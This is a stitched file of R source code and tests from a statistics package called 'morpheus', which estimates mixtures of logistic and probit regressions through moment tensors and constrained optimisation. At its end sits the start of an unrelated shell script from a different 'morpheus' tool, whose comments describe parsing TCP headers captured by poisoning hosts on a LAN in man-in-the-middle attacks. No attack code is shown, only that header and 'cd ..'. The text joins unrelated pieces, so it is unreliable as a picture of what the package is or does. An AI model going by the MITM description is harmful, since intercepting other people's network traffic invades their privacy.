#'   \itemize{
#'     \item 'jd_method', joint diagonalization method from the package jointDiag:
#'       'uwedge' (default) or 'jedi'.
#'     \item 'jd_nvects', number of random vectors for joint-diagonalization
#'       (or 0 for p=d, canonical basis by default)
#'     \item 'M', moments of order 1,2,3: will be computed if not provided.
#'     \item 'K', number of populations (estimated with rank of M2 if not given)
#'   }
#'
#' @return The estimated normalized parameters as columns of a matrix mu of size dxK
#'
#' @seealso \code{multiRun} to estimate statistics based on mu,
#'   and \code{generateSampleIO} for I/O random generation.
#'
#' @examples
#' io <- generateSampleIO(10000, 1/2, matrix(c(1,0,0,1),ncol=2), c(0,0), "probit")
#' mu <- computeMu(io$X, io$Y, list(K=2)) #or just X and Y for estimated K
#'
#' @export
computeMu <- function(X, Y, optargs=list())
{
  if (!is.matrix(X) || !is.numeric(X) || any(is.na(X)))
    stop("X: real matrix, no NA")
  n <- nrow(X)
  d <- ncol(X)
  if (!is.numeric(Y) || length(Y)!=n || any(Y!=0 & Y!=1))
    stop("Y: vector of 0 and 1, size nrow(X), no NA")
  if (!is.list(optargs))
    stop("optargs: list")

  # Step 0: Obtain the empirically estimated moments tensor, estimate also K
  M <- if (is.null(optargs$M)) computeMoments(X,Y) else optargs$M
  K <- optargs$K
  if (is.null(K))
  {
    # TODO: improve this basic heuristic
    Sigma <- svd(M[[2]])$d
    large_ratio <- ( abs(Sigma[-d] / Sigma[-1]) > 3 )
    K <- if (any(large_ratio)) max(2, which.min(large_ratio)) else d
  }
  else if (K > d)
    stop("K: integer >= 2, <= d")

  # Step 1: generate a family of d matrices to joint-diagonalize to increase robustness
  d <- ncol(X)
  fixed_design <- FALSE
  jd_nvects <- ifelse(!is.null(optargs$jd_nvects), optargs$jd_nvects, 0)
  if (jd_nvects == 0)
  {
    jd_nvects <- d
    fixed_design <- TRUE
  }
  M2_t <- array(dim=c(d,d,jd_nvects))
  for (i in seq_len(jd_nvects))
  {
    rho <- if (fixed_design) c(rep(0,i-1),1,rep(0,d-i)) else normalize( rnorm(d) )
    M2_t[,,i] <- .T_I_I_w(M[[3]],rho)
  }

  # Step 2: obtain factors u_i (and their inverse) from the joint diagonalisation of M2_t
  jd_method <- ifelse(!is.null(optargs$jd_method), optargs$jd_method, "uwedge")
  V <-
    if (jd_nvects > 1) {
      # NOTE: increasing itermax does not help to converge, thus we suppress warnings
      suppressWarnings({jd = jointDiag::ajd(M2_t, method=jd_method)})
      if (jd_method=="uwedge") jd$B else MASS::ginv(jd$A)
    }
    else
      eigen(M2_t[,,1])$vectors

  # Step 3: obtain final factors from joint diagonalisation of T(I,I,u_i)
  M2_t <- array(dim=c(d,d,K))
  for (i in seq_len(K))
    M2_t[,,i] <- .T_I_I_w(M[[3]],V[,i])
  suppressWarnings({jd = jointDiag::ajd(M2_t, method=jd_method)})
  U <- if (jd_method=="uwedge") MASS::ginv(jd$B) else jd$A
  mu <- normalize(U[,1:K])

  # M1 also writes M1 = sum_k coeff_k * mu_k, where coeff_k >= 0
  # ==> search decomposition of vector M1 onto the (truncated) basis mu (of size dxK)
  # This is a linear system mu %*% C = M1 with C of size K ==> C = psinv(mu) %*% M1
  C <- MASS::ginv(mu) %*% M[[1]]
  mu[,C < 0] <- - mu[,C < 0]
  mu
}

#' optimParams
#'
#' Wrapper function for OptimParams class
#'
#' @name optimParams
#'
#' @param X Data matrix of covariables
#' @param Y Output as a binary vector
#' @param K Number of populations.
#' @param link The link type, 'logit' or 'probit'.
#' @param M the empirical cross-moments between X and Y (optional)
#' @param nc Number of cores (default: 0 to use all)
#'
#' @return An object 'op' of class OptimParams, initialized so that
#'   \code{op$run(theta0)} outputs the list of optimized parameters
#'   \itemize{
#'     \item p: proportions, size K
#'     \item beta: regression matrix, size dxK
#'     \item b: intercepts, size K
#'   }
#'   theta0 is a list containing the initial parameters. Only beta is required
#'   (p would be set to (1/K,...,1/K) and b to (0,...0)).
#'
#' @seealso \code{multiRun} to estimate statistics based on beta, and
#'   \code{generateSampleIO} for I/O random generation.
#'
#' @examples
#' # Optimize parameters from estimated mu
#' io <- generateSampleIO(100,
#'   1/2, matrix(c(1,-2,3,1),ncol=2), c(0,0), "logit")
#' mu <- computeMu(io$X, io$Y, list(K=2))
#' o <- optimParams(io$X, io$Y, 2, "logit")
#' \donttest{
#' theta0 <- list(p=1/2, beta=mu, b=c(0,0))
#' par0 <- o$run(theta0)
#' # Compare with another starting point
#' theta1 <- list(p=1/2, beta=2*mu, b=c(0,0))
#' par1 <- o$run(theta1)
#' # Look at the function values at par0 and par1:
#' o$f( o$linArgs(par0) )
#' o$f( o$linArgs(par1) )}
#'
#' @export
optimParams <- function(X, Y, K, link=c("logit","probit"), M=NULL, nc=0)
{
  # Check arguments
  if (!is.matrix(X) || any(is.na(X)))
    stop("X: numeric matrix, no NAs")
  if (!is.numeric(Y) || any(is.na(Y)) || any(Y!=0 & Y!=1))
    stop("Y: binary vector with 0 and 1 only")
  link <- match.arg(link)
  if (!is.numeric(K) || K!=floor(K) || K < 2 || K > ncol(X))
    stop("K: integer >= 2, <= d")

  if (is.null(M))
  {
    # Precompute empirical moments
    Mtmp <- computeMoments(X, Y)
    M1 <- as.double(Mtmp[[1]])
    M2 <- as.double(Mtmp[[2]])
    M3 <- as.double(Mtmp[[3]])
    M <- c(M1, M2, M3)
  }
  else
    M <- c(M[[1]], M[[2]], M[[3]])

  # Build and return optimization algorithm object
  methods::new("OptimParams", "li"=link, "X"=X,
    "Y"=as.integer(Y), "K"=as.integer(K), "Mhat"=as.double(M), "nc"=as.integer(nc))
}

# Encapsulated optimization for p (proportions), beta and b (regression parameters)
#
# Optimize the parameters of a mixture of logistic regressions model, possibly using
# \code{mu <- computeMu(...)} as a partial starting point.
#
# @field li Link function, 'logit' or 'probit'
# @field X Data matrix of covariables
# @field Y Output as a binary vector
# @field Mhat Vector of empirical moments
# @field K Number of populations
# @field n Number of sample points
# @field d Number of dimensions
# @field nc Number of cores (OpenMP //)
# @field W Weights matrix (initialized at identity)
#
setRefClass(
  Class = "OptimParams",

  fields = list(
    # Inputs
    li = "character", #link function
    X = "matrix",
    Y = "numeric",
    Mhat = "numeric", #vector of empirical moments
    # Dimensions
    K = "integer",
    n = "integer",
    d = "integer",
    nc = "integer",
    # Weights matrix (generalized least square)
    W = "matrix"
  ),

  methods = list(
    initialize = function(...)
    {
      "Check args and initialize K, d, W"

      callSuper(...)
      if (!hasArg("X") || !hasArg("Y") || !hasArg("K")
        || !hasArg("li") || !hasArg("Mhat") || !hasArg("nc"))
      {
        stop("Missing arguments")
      }

      n <<- nrow(X)
      d <<- ncol(X)
      # W will be initialized when calling run()
    },

    expArgs = function(v)
    {
      "Expand individual arguments from vector v into a list"

      list(
        # p: dimension K-1, need to be completed
        "p" = c(v[1:(K-1)], 1-sum(v[1:(K-1)])),
        "beta" = t(matrix(v[K:(K+d*K-1)], ncol=d)),
        "b" = v[(K+d*K):(K+(d+1)*K-1)])
    },

    linArgs = function(L)
    {
      "Linearize vectors+matrices from list L into a vector"

      # beta linearized row by row, to match derivatives order
      c(L$p[1:(K-1)], as.double(t(L$beta)), L$b)
    },

    # TODO: relocate computeW in utils.R
    computeW = function(theta)
    {
      "Compute the weights matrix from a parameters list"

      require(MASS)
      dd <- d + d^2 + d^3
      M <- Moments(theta)
      Omega <- matrix( .C("Compute_Omega",
        X=as.double(X), Y=as.integer(Y), M=as.double(M),
        pnc=as.integer(nc), pn=as.integer(n), pd=as.integer(d),
        W=as.double(W), PACKAGE="morpheus")$W, nrow=dd, ncol=dd )
      MASS::ginv(Omega)
    },

    Moments = function(theta)
    {
      "Compute the vector of theoretical moments (size d+d^2+d^3)"

      p <- theta$p
      beta <- theta$beta
      lambda <- sqrt(colSums(beta^2))
      b <- theta$b

      # Tensorial products beta^2 = beta2 and beta^3 = beta3 must be computed from current beta1
      beta2 <- apply(beta, 2, function(col) col %o% col)
      beta3 <- apply(beta, 2, function(col) col %o% col %o% col)

      c(
        beta  %*% (p * .G(li,1,lambda,b)),
        beta2 %*% (p * .G(li,2,lambda,b)),
        beta3 %*% (p * .G(li,3,lambda,b)))
    },

    f = function(theta)
    {
      "Function to minimize: t(hat_Mi - Mi(theta)) . W . (hat_Mi - Mi(theta))"

      L <- expArgs(theta)
      A <- as.matrix(Mhat - Moments(L))
      t(A) %*% W %*% A
    },

    grad_f = function(theta)
    {
      "Gradient of f: vector of size (K-1) + d*K + K = (d+2)*K - 1"

      L <- expArgs(theta)
      -2 * t(grad_M(L)) %*% W %*% as.matrix(Mhat - Moments(L))
    },

    grad_M = function(theta)
    {
      "Gradient of the moments vector: matrix of size d+d^2+d^3 x K-1+K+d*K"

      p <- theta$p
      beta <- theta$beta
      lambda <- sqrt(colSums(beta^2))
      mu <- sweep(beta, 2, lambda, '/')
      b <- theta$b

      res <- matrix(nrow=nrow(W), ncol=0)

      # Tensorial products beta^2 = beta2 and beta^3 = beta3 must be computed from current beta1
      beta2 <- apply(beta, 2, function(col) col %o% col)
      beta3 <- apply(beta, 2, function(col) col %o% col %o% col)

      # Some precomputations
      G1 = .G(li,1,lambda,b)
      G2 = .G(li,2,lambda,b)
      G3 = .G(li,3,lambda,b)
      G4 = .G(li,4,lambda,b)
      G5 = .G(li,5,lambda,b)

      # Gradient on p: K-1 columns, dim rows
      km1 = 1:(K-1)
      res <- cbind(res, rbind(
        sweep(as.matrix(beta [,km1]), 2, G1[km1], '*') - G1[K] * beta [,K],
        sweep(as.matrix(beta2[,km1]), 2, G2[km1], '*') - G2[K] * beta2[,K],
        sweep(as.matrix(beta3[,km1]), 2, G3[km1], '*') - G3[K] * beta3[,K] ))

      for (i in 1:d)
      {
        # i determines the derivated matrix dbeta[2,3]

        dbeta_left <- sweep(beta, 2, p * G3 * beta[i,], '*')
        dbeta_right <- matrix(0, nrow=d, ncol=K)
        block <- i
        dbeta_right[block,] <- dbeta_right[block,] + 1
        dbeta <- dbeta_left + sweep(dbeta_right, 2,  p * G1, '*')

        dbeta2_left <- sweep(beta2, 2, p * G4 * beta[i,], '*')
        dbeta2_right <- do.call( rbind, lapply(1:d, function(j) {
          sweep(dbeta_right, 2, beta[j,], '*')
        }) )
        block <- ((i-1)*d+1):(i*d)
        dbeta2_right[block,] <- dbeta2_right[block,] + beta
        dbeta2 <- dbeta2_left + sweep(dbeta2_right, 2, p * G2, '*')

        dbeta3_left <- sweep(beta3, 2, p * G5 * beta[i,], '*')
        dbeta3_right <- do.call( rbind, lapply(1:d, function(j) {
          sweep(dbeta2_right, 2, beta[j,], '*')
        }) )
        block <- ((i-1)*d*d+1):(i*d*d)
        dbeta3_right[block,] <- dbeta3_right[block,] + beta2
        dbeta3 <- dbeta3_left + sweep(dbeta3_right, 2, p * G3, '*')

        res <- cbind(res, rbind(dbeta, dbeta2, dbeta3))
      }

      # Gradient on b
      res <- cbind(res, rbind(
        sweep(beta,  2, p * G2, '*'),
        sweep(beta2, 2, p * G3, '*'),
        sweep(beta3, 2, p * G4, '*') ))

      res
    },

    # userW allows to bypass the W optimization by giving a W matrix
    run = function(theta0, userW=NULL)
    {
      "Run optimization from theta0 with solver..."

      if (!is.list(theta0))
        stop("theta0: list")
      if (is.null(theta0$beta))
        stop("At least theta0$beta must be provided")
      if (!is.matrix(theta0$beta) || any(is.na(theta0$beta))
        || nrow(theta0$beta) != d || ncol(theta0$beta) != K)
      {
        stop("theta0$beta: matrix, no NA, nrow = d, ncol = K")
      }
      if (is.null(theta0$p))
        theta0$p = rep(1/K, K-1)
      else if (!is.numeric(theta0$p) || length(theta0$p) != K-1
        || any(is.na(theta0$p)) || sum(theta0$p) > 1)
      {
        stop("theta0$p: length K-1, no NA, positive integers, sum to <= 1")
      }
      # NOTE: [["b"]] instead of $b because $b would match $beta (in pkg-cran)
      if (is.null(theta0[["b"]]))
        theta0$b = rep(0, K)
      else if (!is.numeric(theta0$b) || length(theta0$b) != K || any(is.na(theta0$b)))
        stop("theta0$b: length K, no NA")

      # (Re)Set W to identity, to allow several run from the same object
      W <<- if (is.null(userW)) diag(d+d^2+d^3) else userW

      # NOTE: loopMax = 3 seems to not improve the final results.
      loopMax <- ifelse(is.null(userW), 2, 1)
      x_init <- linArgs(theta0)
      for (loop in 1:loopMax)
      {
        op_res <- constrOptim( x_init, .self$f, .self$grad_f,
          ui=cbind(
            rbind( rep(-1,K-1), diag(K-1) ),
            matrix(0, nrow=K, ncol=(d+1)*K) ),
          ci=c(-1,rep(0,K-1)) )
        if (loop < loopMax) #avoid computing an extra W
          W <<- computeW(expArgs(op_res$par))
        #x_init <- op_res$par #degrades performances (TODO: why?)
      }

      expArgs(op_res$par)
    }
  )
)

# Compute vectorial E[g^{(order)}(<beta,x> + b)] with x~N(0,Id) (integral in R^d)
#                 = E[g^{(order)}(z)] with z~N(b,diag(lambda))
# by numerically evaluating the integral.
#
# @param link Link, 'logit' or 'probit'
# @param order Order of derivative
# @param lambda Norm of columns of beta
# @param b Intercept
#
.G <- function(link, order, lambda, b)
{
  # NOTE: weird "integral divergent" error on inputs:
  # link="probit"; order=2; lambda=c(531.8099,586.8893,523.5816); b=c(-118.512674,-3.488020,2.109969)
  # Switch to pracma package for that (but it seems slow...)
  sapply( seq_along(lambda), function(k) {
    res <- NULL
    tryCatch({
      # Fast code, may fail:
      res <- stats::integrate(
        function(z) .deriv[[link]][[order]](lambda[k]*z+b[k]) * exp(-z^2/2) / sqrt(2*pi),
        lower=-Inf, upper=Inf )$value
    }, error = function(e) {
      # Robust slow code, no fails observed:
      sink("/dev/null") #pracma package has some useless printed outputs...
      res <- pracma::integral(
        function(z) .deriv[[link]][[order]](lambda[k]*z+b[k]) * exp(-z^2/2) / sqrt(2*pi),
        xmin=-Inf, xmax=Inf, method="Kronrod")
      sink()
    })
    res
  })
}

# Derivatives list: g^(k)(x) for links 'logit' and 'probit'
#
.deriv <- list(
  "probit"=list(
    # 'probit' derivatives list;
    # NOTE: exact values for the integral E[g^(k)(lambdaz+b)] could be computed
    function(x) exp(-x^2/2)/(sqrt(2*pi)),                     #g'
    function(x) exp(-x^2/2)/(sqrt(2*pi)) *  -x,               #g''
    function(x) exp(-x^2/2)/(sqrt(2*pi)) * ( x^2 - 1),        #g^(3)
    function(x) exp(-x^2/2)/(sqrt(2*pi)) * (-x^3 + 3*x),      #g^(4)
    function(x) exp(-x^2/2)/(sqrt(2*pi)) * ( x^4 - 6*x^2 + 3) #g^(5)
  ),
  "logit"=list(
    # Sigmoid derivatives list, obtained with http://www.derivative-calculator.net/
    # @seealso http://www.ece.uc.edu/~aminai/papers/minai_sigmoids_NN93.pdf
    function(x) {e=exp(x); .zin(e                                    /(e+1)^2)}, #g'
    function(x) {e=exp(x); .zin(e*(-e   + 1)                         /(e+1)^3)}, #g''
    function(x) {e=exp(x); .zin(e*( e^2 - 4*e    + 1)                /(e+1)^4)}, #g^(3)
    function(x) {e=exp(x); .zin(e*(-e^3 + 11*e^2 - 11*e   + 1)       /(e+1)^5)}, #g^(4)
    function(x) {e=exp(x); .zin(e*( e^4 - 26*e^3 + 66*e^2 - 26*e + 1)/(e+1)^6)}  #g^(5)
  )
)

# Utility for integration: "[return] zero if [argument is] NaN" (Inf / Inf divs)
#
# @param x Ratio of polynoms of exponentials, as in .S[[i]]
#
.zin <- function(x)
{
  x[is.nan(x)] <- 0.
  x
}

naive_f <- function(link, M1,M2,M3, p,beta,b)
{
  d <- length(M1)
  K <- length(p)
  lambda <- sqrt(colSums(beta^2))

  # Compute beta x2,3 (self) tensorial products
  beta2 <- array(0, dim=c(d,d,K))
  beta3 <- array(0, dim=c(d,d,d,K))
  for (k in 1:K)
  {
    for (i in 1:d)
    {
      for (j in 1:d)
      {
        beta2[i,j,k] = beta[i,k]*beta[j,k]
        for (l in 1:d)
          beta3[i,j,l,k] = beta[i,k]*beta[j,k]*beta[l,k]
      }
    }
  }

  res <- 0
  for (i in 1:d)
  {
    term <- 0
    for (k in 1:K)
      term <- term + p[k]*.G(link,1,lambda[k],b[k])*beta[i,k]
    res <- res + (term - M1[i])^2
    for (j in 1:d)
    {
      term <- 0
      for (k in 1:K)
        term <- term + p[k]*.G(link,2,lambda[k],b[k])*beta2[i,j,k]
      res <- res + (term - M2[i,j])^2
      for (l in 1:d)
      {
        term <- 0
        for (k in 1:K)
          term <- term + p[k]*.G(link,3,lambda[k],b[k])*beta3[i,j,l,k]
        res <- res + (term - M3[i,j,l])^2
      }
    }
  }
  res
}

# TODO: understand why delta is so large (should be 10^-6 10^-7 ...)
test_that("naive computation provides the same result as vectorized computations",
{
  set.seed(7)
  h <- 1e-7 #for finite-difference tests
  n <- 10
  for (dK in list( c(2,2), c(5,3)))
  {
    d <- dK[1]
    K <- dK[2]

    M1 <- runif(d, -1, 1)
    M2 <- matrix(runif(d^2, -1, 1), ncol=d)
    M3 <- array(runif(d^3, -1, 1), dim=c(d,d,d))

    for (link in c("logit","probit"))
    {
      # X and Y are unused here (W not re-computed)
      op <- optimParams(X=matrix(runif(n*d),ncol=d), Y=rbinom(n,1,.5),
        K, link, M=list(M1,M2,M3))
      op$W <- diag(d + d^2 + d^3)

      for (var in seq_len((2+d)*K-1))
      {
        p <- runif(K, 0, 1)
        p <- p / sum(p)
        beta <- matrix(runif(d*K,-5,5),ncol=K)
        b <- runif(K, -5, 5)
        x <- c(p[1:(K-1)],as.double(beta),b)

        # Test functions values (TODO: 1 is way too high)
        expect_equal( op$f(x)[1], naive_f(link,M1,M2,M3, p,beta,b), tolerance=1 )

        # Test finite differences ~= gradient values
        dir_h <- rep(0, (2+d)*K-1)
        dir_h[var] = h
        expect_equal( op$grad_f(x)[var], ((op$f(x+dir_h) - op$f(x)) / h)[1], tolerance=0.5 )
      }
    }
  }
})

test_that("W computed in C and in R are the same",
{
  set.seed(7)
  tol <- 1e-8
  n <- 10
  for (dK in list( c(2,2))) #, c(5,3)))
  {
    d <- dK[1]
    K <- dK[2]
    link <- ifelse(d==2, "logit", "probit")
    theta <- list(
      p=rep(1/K,K),
      beta=matrix(runif(d*K),ncol=K),
      b=rep(0,K))
    io <- generateSampleIO(n, theta$p, theta$beta, theta$b, link)
    X <- io$X
    Y <- io$Y
    dd <- d + d^2 + d^3
    p <- theta$p
    beta <- theta$beta
    lambda <- sqrt(colSums(beta^2))
    b <- theta$b
    beta2 <- apply(beta, 2, function(col) col %o% col)
    beta3 <- apply(beta, 2, function(col) col %o% col %o% col)
    M <- c(
      beta  %*% (p * .G(link,1,lambda,b)),
      beta2 %*% (p * .G(link,2,lambda,b)),
      beta3 %*% (p * .G(link,3,lambda,b)))
    Id <- as.double(diag(d))
    E <- diag(d)
    v1 <- Y * X
    v2 <- Y * t( apply(X, 1, function(Xi) Xi %o% Xi - Id) )
    v3 <- Y * t( apply(X, 1, function(Xi) { return (Xi %o% Xi %o% Xi
      - Reduce('+', lapply(1:d, function(j)
        as.double(Xi %o% E[j,] %o% E[j,])), rep(0, d*d*d))
      - Reduce('+', lapply(1:d, function(j)
        as.double(E[j,] %o% Xi %o% E[j,])), rep(0, d*d*d))
      - Reduce('+', lapply(1:d, function(j)
        as.double(E[j,] %o% E[j,] %o% Xi)), rep(0, d*d*d))) } ) )
    Omega1 <- matrix(0, nrow=dd, ncol=dd)
    for (i in 1:n)
    {
      gi <- t(as.matrix(c(v1[i,], v2[i,], v3[i,]) - M))
      Omega1 <- Omega1 + t(gi) %*% gi / n
    }
    W <- matrix(0, nrow=dd, ncol=dd)
    Omega2 <- matrix( .C("Compute_Omega",
      X=as.double(X), Y=as.integer(Y), M=as.double(M),
      pnc=as.integer(1), pn=as.integer(n), pd=as.integer(d),
      W=as.double(W), PACKAGE="morpheus")$W, nrow=dd, ncol=dd )
    rg <- range(Omega1 - Omega2)
    expect_equal(rg[1], rg[2], tolerance=tol)
  }
})

# extractParam
#
# Extract successive values of a projection of the parameter(s).
# The method works both on a list of lists of results,
# or on a single list of parameters matrices.
#
# @inheritParams plotHist
#
.extractParam <- function(mr, x=1, y=1)
{
  if (is.list(mr[[1]])) {
    # Obtain L vectors where L = number of res lists in mr
    return ( lapply( mr, function(mr_list) {
      sapply(mr_list, function(m) m[x,y])
    } ) )
  }
  sapply(mr, function(m) m[x,y])
}

#' plotHist
#'
#' Plot compared histograms of a single parameter (scalar)
#'
#' @name plotHist
#'
#' @param mr Output of multiRun(), list of lists of functions results
#' @param x Row index of the element inside the aggregated parameter
#' @param y Column index of the element inside the aggregated parameter
#' @param ... Additional graphical parameters (xlab, ylab, ...)
#'
#' @examples
#' # mr[[i]] is a list of estimated parameters matrices (here random matrices).
#' # Should be mr <- multiRun(...) --> see bootstrap example in ?multiRun.
#' simmr_path <- system.file("extdata", "simulateMr.R", package = "morpheus")
#' source(simmr_path)
#' mr <- simulateMr(c(2,2), 10)$mr
#' plotHist(mr, 2, 1) #second row, first column
#'
#' @return No return value, called for side effects.
#'
#' @export
plotHist <- function(mr, x, y, ...)
{
  oldpar <- par(no.readonly = TRUE)
  on.exit(par(oldpar))

  params <- .extractParam(mr, x, y)
  L <- length(params)
  # Plot histograms side by side
  par(mfrow=c(1,L), cex.axis=1.5, cex.lab=1.5, mar=c(4.7,5,1,1))
  args <- list(...)
  for (i in 1:L) {
    hist(params[[i]], breaks=40, freq=FALSE,
      xlab=ifelse("xlab" %in% names(args), args$xlab, "Parameter value"),
      ylab=ifelse("ylab" %in% names(args), args$ylab, "Density"))
  }
  NULL
}

# NOTE: roxygen2 bug, "@inheritParams plotHist" fails in next header:

#' plotBox
#'
#' Draw compared boxplots of a single parameter (scalar)
#'
#' @name plotBox
#'
#' @param mr Output of multiRun(), list of lists of functions results
#' @param x Row index of the element inside the aggregated parameter
#' @param y Column index of the element inside the aggregated parameter
#' @param ... Additional graphical parameters (xlab, ylab, ...)
#'
#' @examples
#' # mr[[i]] is a list of estimated parameters matrices (here random matrices).
#' # Should be mr <- multiRun(...) --> see bootstrap example in ?multiRun.
#' simmr_path <- system.file("extdata", "simulateMr.R", package = "morpheus")
#' source(simmr_path)
#' source(simmr_path)
#' mr <- simulateMr(c(2,2), 10)$mr
#' plotBox(mr, 2, 1) #second row, first column
#'
#' @return No return value, called for side effects.
#'
#' @export
plotBox <- function(mr, x, y, ...)
{
  oldpar <- par(no.readonly = TRUE)
  on.exit(par(oldpar))

  params <- .extractParam(mr, x, y)
  L <- length(params)
  # Plot boxplots side by side
  par(mfrow=c(1,L), cex.axis=1.5, cex.lab=1.5, mar=c(4.7,5,1,1))
  for (i in 1:L)
    boxplot(params[[i]], ...)
  NULL
}

#' plotCoefs
#'
#' Draw a graph of (averaged) coefficients estimations with their standard,
#' deviations ordered by mean values.
#' Note that the drawing does not correspond to a function; it is just a
#' convenient way to visualize the estimated parameters.
#'
#' @name plotCoefs
#'
#' @param mr List of parameters matrices
#' @param params True value of the parameters matrix
#' @param ... Additional graphical parameters
#'
#' @examples
#' # mr[[i]] is a list of estimated parameters matrices (here random matrices).
#' # Should be mr <- multiRun(...) --> see bootstrap example in ?multiRun.
#' simmr_path <- system.file("extdata", "simulateMr.R", package = "morpheus")
#' source(simmr_path)
#' mr_theta <- simulateMr(c(3,2), 10)
#' mr <- mr_theta$mr ; theta <- mr_theta$theta
#' plotCoefs(mr[[1]], theta)
#'
#' @return No return value, called for side effects.
#'
#' @export
plotCoefs <- function(mr, params, ...)
{
  oldpar <- par(no.readonly = TRUE)
  on.exit(par(oldpar))

  d <- nrow(mr[[1]])
  K <- ncol(mr[[1]])

  params_hat <- matrix(nrow=d, ncol=K)
  stdev <- matrix(nrow=d, ncol=K)
  for (x in 1:d) {
    for (y in 1:K) {
      estims <- .extractParam(mr, x, y)
      params_hat[x,y] <- mean(estims)
      # Another way to compute stdev: using distances to true params
#      stdev[x,y] <- sqrt( mean( (estims - params[x,y])^2 ) )
      # HACK remove extreme quantile in estims[[i]] before computing sd()
      stdev[x,y] <- sd(estims) #[ estims < max(estims) & estims > min(estims) ] )
    }
  }

  par(cex.axis=1.5, cex.lab=1.5, mar=c(4.7,5,1,1))
  params <- as.double(params)
  o <- order(params)
  avg_param <- as.double(params_hat)
  std_param <- as.double(stdev)
  args <- list(...)
  matplot(
    cbind(params[o],avg_param[o],
      avg_param[o]+std_param[o],avg_param[o]-std_param[o]),
    col=1, lty=c(1,5,3,3), type="l", lwd=2,
    xlab=ifelse("xlab" %in% names(args), args$xlab, "Parameter index"),
    ylab=ifelse("ylab" %in% names(args), args$ylab, "") )
  NULL
}

#' multiRun
#'
#' Estimate N times some parameters, outputs of some list of functions.
#' This method is thus very generic, allowing typically bootstrap or
#' Monte-Carlo estimations of matrices mu or beta.
#' Passing a list of functions opens the possibility to compare them on a fair
#' basis (exact same inputs). It's even possible to compare methods on some
#' deterministic design of experiments.
#'
#' @name multiRun
#'
#' @param fargs List of arguments for the estimation functions
#' @param estimParams List of nf function(s) to apply on fargs
#' @param packages Vector of packages to load on each node (default: morpheus)
#' @param prepareArgs Prepare arguments for the functions inside estimParams
#' @param N Number of runs
#' @param ncores Number of cores for parallel runs (<=1: sequential)
#' @param agg Aggregation method (default: lapply)
#' @param verbose TRUE to indicate runs + methods numbers
#'
#' @return A list of nf aggregates of N results (matrices).
#'
#' @examples
#' \donttest{
#' beta <- matrix(c(1,-2,3,1),ncol=2)
#'
#' # This example requires a patch for the flexmix package written by Bettina Grün:
#' patch_path <- system.file("extdata", "FLXMRglm.R", package = "morpheus")
#' source(patch_path)
#'
#' # Bootstrap + computeMu, morpheus VS flexmix
#' io <- generateSampleIO(n=1000, p=1/2, beta=beta, b=c(0,0), "logit")
#' mu <- normalize(beta)
#' res <- multiRun(list(X=io$X,Y=io$Y,K=2), list(
#'   # morpheus
#'   function(fargs) {
#'     ind <- fargs$ind
#'     computeMu(fargs$X[ind,], fargs$Y[ind], list(K=fargs$K))
#'   },
#'   # flexmix
#'   function(fargs) {
#'     ind <- fargs$ind
#'     K <- fargs$K
#'     dat <- as.data.frame( cbind(fargs$Y[ind],fargs$X[ind,]) )
#'     out <- refit( flexmix( cbind(V1, 1 - V1) ~ 0+., data=dat, k=K,
#'       model=FLXMRglm(family="binomial") ) )
#'     normalize( matrix(out@@coef[1:(ncol(fargs$X)*K)], ncol=K) )
#'   } ),
#'   packages = c("morpheus", "flexmix"),
#'   prepareArgs = function(fargs,index) {
#'     if (index == 1)
#'       fargs$ind <- 1:nrow(fargs$X)
#'     else
#'       fargs$ind <- sample(1:nrow(fargs$X),replace=TRUE)
#'     fargs
#'   }, N=10, ncores=1) #ncores=3
#' for (i in 1:2)
#'   res[[i]] <- alignMatrices(res[[i]], ref=mu, ls_mode="exact")
#'
#' # Monte-Carlo + optimParams from X,Y, morpheus VS flexmix
#' res <- multiRun(list(n=1000,p=1/2,beta=beta,b=c(0,0),link="logit"), list(
#'   # morpheus
#'   function(fargs) {
#'     K <- fargs$K
#'     mu <- computeMu(fargs$X, fargs$Y, list(K=fargs$K))
#'     o <- optimParams(fargs$X, fargs$Y, fargs$K, fargs$link, fargs$M)
#'     o$run(list(beta=mu))$beta
#'   },
#'   # flexmix
#'   function(fargs) {
#'     K <- fargs$K
#'     dat <- as.data.frame( cbind(fargs$Y,fargs$X) )
#'     out <- refit( flexmix( cbind(V1, 1 - V1) ~ ., data=dat, k=K,
#'       model=FLXMRglm(family="binomial") ) )
#'     sapply( seq_len(K), function(i)
#'       as.double( out@@components[[1]][[i]][2:(1+ncol(fargs$X)),1] ) )
#'   } ),
#'   packages = c("morpheus", "flexmix"),
#'   prepareArgs = function(fargs,index) {
#'     library(morpheus)
#'     io <- generateSampleIO(fargs$n, fargs$p, fargs$beta, fargs$b, fargs$link)
#'     fargs$X <- io$X
#'     fargs$Y <- io$Y
#'     fargs$K <- ncol(fargs$beta)
#'     fargs$link <- fargs$link
#'     fargs$M <- computeMoments(io$X,io$Y)
#'     fargs
#'   }, N=10, ncores=1) #ncores=3
#' for (i in 1:2)
#'   res[[i]] <- alignMatrices(res[[i]], ref=beta, ls_mode="exact")}
#'
#' @export
multiRun <- function(fargs, estimParams, packages = c("morpheus"),
  prepareArgs = function(x,i) x, N=10, ncores=3, agg=lapply, verbose=FALSE)
{
  if (!is.list(fargs))
    stop("fargs: list")
  # No checks on fargs: supposedly done in estimParams[[i]]()
  if (!is.list(estimParams))
    estimParams = list(estimParams)
  # Verify that the provided parameters estimations are indeed functions
  lapply(seq_along(estimParams), function(i) {
    if (!is.function(estimParams[[i]]))
      stop("estimParams: list of function(fargs)")
  })
  if (!is.numeric(N) || N < 1)
    stop("N: positive integer")

  estimParamAtIndex <- function(index)
  {
    fargs <- prepareArgs(fargs, index)
    if (verbose)
      cat("Run ",index,"\n")
    lapply(seq_along(estimParams), function(i) {
      if (verbose)
        cat("   Method ",i,"\n")
      out <- estimParams[[i]](fargs)
      if (is.list(out))
        do.call(rbind, out)
      else
        out
    })
  }

  loadPackages <- function() {
    for (p in packages)
      library(p, character.only = TRUE)
  }

  if (ncores > 1)
  {
    cl <- parallel::makeCluster(ncores, outfile="")
    parallel::clusterExport(cl, c("fargs", "verbose", "loadPackages"), environment())
    parallel::clusterEvalQ(cl, loadPackages() )
    list_res <- parallel::clusterApplyLB(cl, 1:N, estimParamAtIndex)
    parallel::stopCluster(cl)
  }
  else {
    loadPackages()
    list_res <- lapply(1:N, estimParamAtIndex)
  }

  # De-interlace results: output one list per function
  nf <- length(estimParams)
  lapply( seq_len(nf), function(i) lapply(seq_len(N), function(j) list_res[[j]][[i]]) )
}

#!/bin/sh
##
# 'http tcp header information gathering'
# This script will parse tcp header data collected by morpheus under MITM attacks.
# Basic we use morpheus.sh tool to poison target host under LAN to be abble to
# capture is network communications and extract juice info for tcp headers.
# Special Thanks: shanty damayanti
## resize -s 27 109 > /dev/null



#
# Variable declarations function ..
#
cd ..
